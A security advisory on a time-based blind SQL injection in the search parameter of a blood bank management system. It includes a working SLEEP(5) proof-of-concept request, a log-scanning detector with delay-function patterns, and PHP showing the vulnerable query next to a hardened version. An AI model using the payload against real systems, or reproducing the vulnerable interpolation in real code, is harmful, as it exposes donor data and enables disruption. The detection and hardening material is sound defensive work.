- BloodBank Management System: 1.0
- Vulnerability Type: SQL Injection (Time-Based Blind)
- Severity: HIGH
- Status: Unpatched
- Affected Endpoint: /abs.php?search=A%2B&submit=search
A SQL injection vulnerability has been identified in BloodBank Management System version 1.0. It is located in the search functionality used to query blood type availability: the search parameter of abs.php is not properly sanitized before being used in a SQL query, allowing attackers to inject malicious SQL into it.
This vulnerability allows an attacker to manipulate SQL queries and execute arbitrary database commands, potentially leading to:
- Unauthorized access to sensitive data (e.g., donor or recipient information).
- Database corruption or deletion.
- Denial of Service (DoS) attacks by causing the database to execute time-consuming operations.
Because the payload is delivered through the search feature, this high-risk vulnerability can be exploited by remote attackers, leading to a significant breach of confidentiality and availability.
The following GET request demonstrates the time-based blind SQL injection. The payload makes the database call SLEEP(5), so a response delayed by about 5 seconds confirms that the injected SQL was executed:
GET /abs.php?search=A%2b'%20AND%20(SELECT%209622%20FROM%20(SELECT(SLEEP(5)))lCfZ)--%20lpxk%26submit%3dsearch&submit=search HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/abs.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
If the injection is successful, the server pauses for about 5 seconds before responding. This confirms the vulnerability and shows that the query can be manipulated to execute arbitrary SQL commands.
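Because a time-based blind probe leaves almost no trace in the response body, the most reliable place to spot it is the web server access log: a search request whose query string carries a delay function, and whose response time is far above the norm for a trivial lookup. The script below is an added example, not code from the advisory or from the BloodBank project. It assumes Apache combined log format with the request duration in microseconds (%D) appended as the last field; the log lines are constructed for the example, with the second one reusing the request target from the PoC above.

```php
<?php
// Added example: scan access-log lines for time-based blind SQL injection
// probes against the search endpoint. Assumed log format: Apache combined
// log with the request duration in microseconds (%D) as the last field.
// The sample lines are constructed for this example.

const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [01/Oct/2024:10:15:01 +0000] "GET /abs.php?search=A%2B&submit=search HTTP/1.1" 200 1834 "-" "Mozilla/5.0" 12045
10.0.0.9 - - [01/Oct/2024:10:15:07 +0000] "GET /abs.php?search=A%2b'%20AND%20(SELECT%209622%20FROM%20(SELECT(SLEEP(5)))lCfZ)--%20lpxk%26submit%3dsearch&submit=search HTTP/1.1" 200 1834 "-" "Mozilla/5.0" 5010322
10.0.0.9 - - [01/Oct/2024:10:15:15 +0000] "GET /abs.php?search=O-&submit=search HTTP/1.1" 200 1790 "-" "Mozilla/5.0" 9871
LOG;

// Delay primitives of the common database engines. None of these can occur in
// a legitimate blood-type search value such as "A+" or "O-".
const DELAY_PATTERNS = '/\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY/i';

// A blood-type lookup should answer in milliseconds; anything slower than
// this (microseconds) is worth a second look even without a known pattern.
const SLOW_THRESHOLD_US = 3000000;

// Returns one finding per suspicious line: client IP, path, reasons, and the
// decoded query string for the analyst to inspect.
function analyze_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // ip ... "METHOD target HTTP/x.y" status bytes "referer" "agent" duration
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\/[\d.]+" \d{3} \d+ "[^"]*" "[^"]*" (\d+)$/', $line, $m)) {
            continue; // not in the expected format, skip
        }
        [, $ip, $target, $duration] = $m;

        // rawurldecode keeps a literal "+" (part of "A+") instead of turning it
        // into a space, so the decoded text still reads as the attacker sent it.
        $query = (string) (parse_url($target, PHP_URL_QUERY) ?: '');
        $decoded = rawurldecode($query);

        $reasons = [];
        if (preg_match(DELAY_PATTERNS, $decoded)) {
            $reasons[] = 'delay function in query string';
        }
        if ((int) $duration > SLOW_THRESHOLD_US) {
            $reasons[] = sprintf('slow response (%.1fs)', $duration / 1e6);
        }
        if ($reasons) {
            $findings[] = [
                'ip'            => $ip,
                'path'          => parse_url($target, PHP_URL_PATH),
                'reasons'       => $reasons,
                'decoded_query' => $decoded,
            ];
        }
    }
    return $findings;
}

foreach (analyze_log(SAMPLE_LOG) as $f) {
    printf("%s %s: %s\n  %s\n", $f['ip'], $f['path'], implode('; ', $f['reasons']), $f['decoded_query']);
}
```

On the constructed input only the second line is reported, for both reasons at once: the decoded query string contains SLEEP( and the response took about 5 seconds. Matching on the decoded string matters because the PoC encodes the payload's spaces and its own `&`/`=` characters, so a pattern applied to the raw log line would miss variants that encode the function name itself.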
Impact:
- Data Breach: Unauthorized access to personal information such as blood donors' and recipients' data.
- Service Disruption: Attackers can overload the database, causing a Denial of Service (DoS) by executing time-intensive queries.
- Data Corruption: Malicious actors can modify or delete critical data in the system.
Recommended mitigations:
- Input Validation & Sanitization: Use parameterized queries or prepared statements so that user input is never concatenated into SQL text.
- Error Handling: Ensure error messages do not reveal database details or SQL query structure.
- Rate Limiting: Rate-limit search requests to limit abuse of the endpoint for DoS.
- Database User Privileges: Restrict the privileges of the application's database user to minimize the impact of a successful SQL injection.
- Security Audits: Regularly perform code reviews and penetration tests to identify and fix vulnerabilities.
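The following PHP is an added example, not the BloodBank Management System's own code, showing the vulnerable pattern the advisory describes next to a hardened search handler that applies the first, second and fourth mitigations above. The table name blood_stock, its columns, and the database connection parameters are assumptions chosen for illustration; the real schema of abs.php is not known from the advisory.

```php
<?php
// Added example (not the project's code). Assumed schema: table blood_stock
// with columns blood_type and units; assumed connection details below.

// --- Vulnerable pattern (the defect the advisory describes) ---
// The search value is interpolated into the SQL text, so a value such as
// A+' AND (SELECT SLEEP(5))-- -  becomes part of the statement.
function search_vulnerable(mysqli $db, string $search): array
{
    $sql = "SELECT blood_type, units FROM blood_stock WHERE blood_type = '$search'";
    $rows = [];
    if ($result = $db->query($sql)) {
        while ($row = $result->fetch_assoc()) {
            $rows[] = $row;
        }
        $result->free();
    }
    return $rows;
}

// --- Hardened version ---
// 1. Allowlist validation: a blood type is one of eight fixed strings, so any
//    other value is rejected before it reaches the database at all.
// 2. Prepared statement with a bound parameter: the value travels to MySQL
//    separately from the query text and cannot alter the query's structure.
const BLOOD_TYPES = ['A+', 'A-', 'B+', 'B-', 'AB+', 'AB-', 'O+', 'O-'];

function search_safe(mysqli $db, string $search): array
{
    $search = trim($search);
    if (!in_array($search, BLOOD_TYPES, true)) {
        return []; // unknown blood type: nothing to look up, nothing sent to SQL
    }

    $stmt = $db->prepare('SELECT blood_type, units FROM blood_stock WHERE blood_type = ?');
    $stmt->bind_param('s', $search);
    $stmt->execute();
    // get_result()/fetch_all() need the mysqlnd driver, which is the default
    // on current PHP builds.
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// --- Request handler ---
// mysqli throws exceptions instead of emitting warnings, so a failure can be
// logged server-side while the client sees only a generic message (the
// "Error Handling" mitigation). The account used here is assumed to be a
// read-only database user (the "Database User Privileges" mitigation).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

try {
    $db = new mysqli('localhost', 'bloodbank_ro', 'placeholder-password', 'bloodbank'); // assumed
    $rows = search_safe($db, $_GET['search'] ?? '');
    foreach ($rows as $row) {
        printf("%s: %d units\n", htmlspecialchars($row['blood_type']), (int) $row['units']);
    }
} catch (mysqli_sql_exception $e) {
    error_log('blood stock search failed: ' . $e->getMessage()); // details stay in the log
    http_response_code(500);
    echo 'The search could not be completed. Please try again later.';
}
```

With the hardened handler, the PoC request above never reaches the database: `A+' AND (SELECT ...)` is not in the allowlist, so the function returns an empty result set immediately. Even a value that did pass the allowlist is bound as data, not parsed as SQL, so the SLEEP(5) delay that confirmed the original issue cannot be triggered.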